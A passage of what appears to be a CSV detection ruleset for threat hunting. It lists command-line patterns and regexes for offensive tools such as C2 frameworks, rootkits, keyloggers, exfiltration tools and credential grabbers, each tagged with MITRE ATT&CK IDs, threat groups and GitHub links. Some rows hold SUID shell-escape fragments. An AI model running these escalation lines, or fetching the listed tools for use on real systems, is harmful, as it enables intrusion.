BEAR","C2","https://github.com/offsecginger/koadic","1","1","#linux","N/A","10","10","270","78","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
"*./kubestroyer*",".{0,1000}\.\/kubestroyer.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","0","#linux","N/A","10","4","356","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z"
"*./Lalin.sh*",".{0,1000}\.\/Lalin\.sh.{0,1000}","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/LALIN","1","1","#linux","N/A","N/A","4","359","150","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z"
"*./litefuzz.py*",".{0,1000}\.\/litefuzz\.py.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","1","#linux","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z"
"*./logger.sh * &> /dev/null && exit*",".{0,1000}\.\/logger\.sh\s.{0,1000}\s\&\>\s\/dev\/null\s\&\&\sexit.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","0","#linux","N/A","9","3","270","41","2024-06-16T19:47:36Z","2024-01-10T17:25:58Z"
"*./lse.sh*",".{0,1000}\.\/lse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"*./manjusaka*",".{0,1000}\.\/manjusaka.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/manjusaka","1","1","#linux","N/A","10","10","795","147","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z"
"*./Microsploit*",".{0,1000}\.\/Microsploit.{0,1000}","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Microsploit","1","1","#linux","N/A","N/A","5","437","122","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z"
"*./monkey.sh*",".{0,1000}\.\/monkey\.sh.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","#linux","N/A","N/A","10","6692","788","2024-11-12T21:39:26Z","2015-08-30T07:22:51Z"
"*./msfinstall*",".{0,1000}\.\/msfinstall.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","https://x.com/mthcht/status/1827714529687658796","10","10","34357","14025","2024-12-07T15:05:00Z","2011-08-30T06:13:20Z"
"*/Diamorphine.git*",".{0,1000}\/Diamorphine\.git.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","1","#linux","N/A","10","10","1856","436","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*./nice /bin/sh -p*",".{0,1000}\.\/nice\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*./Ninja.py*",".{0,1000}\.\/Ninja\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","#linux","N/A","10","10","783","169","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
"*./nmap*",".{0,1000}\.\/nmap.{0,1000}","greyware_tool_keyword","nmap","A very common tool. Network host vuln and port detector.","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13","Discovery","https://github.com/nmap/nmap","1","1","#linux","greyware tool - risks of False positive !","8","10","10302","2421","2024-12-06T21:45:06Z","2012-03-09T14:47:43Z"
"*./nps install *",".{0,1000}\.\/nps\sinstall\s.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#linux","N/A","9","10","2360","302","2024-11-21T09:23:24Z","2022-09-14T06:24:00Z"
"*./ntdissector*",".{0,1000}\.\/ntdissector.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","#linux","N/A","9","2","127","15","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z"
"*./nysm/src/",".{0,1000}\.\/nysm\/src\/","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/eeriedusk/nysm","1","0","#linux","N/A","10","3","239","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z"
"*./Obfuscated_*.py*",".{0,1000}\.\/Obfuscated_.{0,1000}\.py.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#linux","N/A","10","10","917","393","2024-07-11T23:05:33Z","2022-05-02T12:53:00Z"
"*./obfuscator -i *.ps1*",".{0,1000}\.\/obfuscator\s\-i\s.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","psobf","PowerShell Obfuscator","T1027 - T1059 - T1564","TA0005","N/A","N/A","Defense Evasion","https://github.com/TaurusOmar/psobf","1","0","#linux","N/A","6","1","99","16","2024-06-07T02:50:43Z","2024-06-07T01:45:12Z"
"*./pachine.py*",".{0,1000}\.\/pachine\.py.{0,1000}","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","#linux","N/A","8","3","270","38","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z"
"*./Passdetective*",".{0,1000}\.\/Passdetective.{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","#linux","N/A","7","2","121","8","2024-06-19T10:39:39Z","2023-07-22T12:31:57Z"
"*./Pcredz *",".{0,1000}\.\/Pcredz\s.{0,1000}","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","#linux","N/A","N/A","10","2026","403","2024-10-08T12:01:35Z","2014-04-07T02:03:33Z"
"*./peass.rb*",".{0,1000}\.\/peass\.rb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#linux","N/A","10","10","16361","3115","2024-12-05T17:08:48Z","2019-01-13T19:58:24Z"
"*./PEzor.sh*",".{0,1000}\.\/PEzor\.sh.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1868","323","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z"
"*./Phishing.sh*",".{0,1000}\.\/Phishing\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","#linux","N/A","10","7","673","109","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z"
"*./pwndrop *",".{0,1000}\.\/pwndrop\s.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","#linux","N/A","10","10","2035","263","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z"
"*./PyShell *",".{0,1000}\.\/PyShell\s.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/JoelGMSec/PyShell","1","0","#linux","N/A","N/A","3","298","59","2024-09-27T11:11:56Z","2021-10-19T07:49:17Z"
"*./recv -d :50001*",".{0,1000}\.\/recv\s\-d\s\:50001.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","#linux","N/A","10","2","137","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z"
"*./RedGuard*",".{0,1000}\.\/RedGuard.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","#linux","N/A","10","10","1417","197","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z"
"*./redirector.py *",".{0,1000}\.\/redirector\.py\s.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","0","#linux","N/A","10","10","297","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z"
"*./reverse-ssh*",".{0,1000}\.\/reverse\-ssh.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#linux","N/A","10","10","932","136","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z"
"*./rotateproxy*",".{0,1000}\.\/rotateproxy.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#linux","N/A","10","8","779","132","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z"
"*./rpcrt.py*",".{0,1000}\.\/rpcrt\.py.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/yuanLink/CVE-2022-26809","1","1","#linux","N/A","N/A","1","59","27","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z"
"*./rsockstun*",".{0,1000}\.\/rsockstun.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","COZY BEAR","C2","https://github.com/llkat/rsockstun","1","0","#linux","N/A","10","10","50","21","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z"
"*./rsocx -*",".{0,1000}\.\/rsocx\s\-.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","0","#linux","N/A","10","10","375","140","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z"
"*./rview -c ':py3 import os*os.execl(\""/bin/sh\*",".{0,1000}\.\/rview\s\-c\s\'\:py3\simport\sos.{0,1000}os\.execl\(\\\""\/bin\/sh\\.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*./rwf.py*",".{0,1000}\.\/rwf\.py.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","#linux","N/A","10","2","181","27","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z"
"*./scan4all *",".{0,1000}\.\/scan4all\s.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","#linux","N/A","10","10","5583","666","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z"
"*./scan4all*",".{0,1000}\.\/scan4all.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","#linux","N/A","10","10","5583","666","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z"
"*./ScareCrow *",".{0,1000}\.\/ScareCrow\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","#linux","N/A","10","10","2746","508","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
"*./ScareCrow -*",".{0,1000}\.\/ScareCrow\s\-.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","#linux","N/A","N/A","10","2746","508","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
"*./ScareCrow*",".{0,1000}\.\/ScareCrow.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","#linux","N/A","N/A","10","2746","508","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
"*./send -d *:123 -f *",".{0,1000}\.\/send\s\-d\s.{0,1000}\:123\s\-f\s.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","#linux","N/A","10","2","137","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z"
"*./seth.sh * *",".{0,1000}\.\/seth\.sh\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","#linux","N/A","9","10","1399","322","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z"
"*./slip.py *",".{0,1000}\.\/slip\.py\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","0","#linux","N/A","10","1","90","4","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z"
"*./sliver-client_linux*",".{0,1000}\.\/sliver\-client_linux.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR","C2","https://github.com/BishopFox/sliver","1","0","#linux","N/A","10","10","8641","1139","2024-12-03T20:33:10Z","2019-01-17T22:07:38Z"
"*./snaffler_downloads*",".{0,1000}\.\/snaffler_downloads.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","#linux","N/A","10","1","86","5","2024-08-20T12:54:41Z","2023-11-17T21:52:40Z"
"*./snake",".{0,1000}\.\/snake","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","#linux","N/A","7","8","739","109","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z"
"*./SourcePoint *",".{0,1000}\.\/SourcePoint\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","0","#linux","N/A","10","10","1049","154","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z"
"*./sshimpanzee*",".{0,1000}\.\/sshimpanzee.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","0","#linux","N/A","10","10","240","27","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z"
"*./staqlab-tunnel *",".{0,1000}\.\/staqlab\-tunnel\s.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","0","#linux","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z"
"*./sudomy*",".{0,1000}\.\/sudomy.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","#linux","N/A","N/A","10","2024","381","2024-06-27T10:07:42Z","2019-07-26T10:26:34Z"
"*./t14m4t *",".{0,1000}\.\/t14m4t\s.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","0","#linux","N/A","N/A","4","395","84","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
"*./teamserver *",".{0,1000}\.\/teamserver\s.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t0v3rr1d3/armitage","1","0","#linux","N/A","N/A","2","122","30","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z"
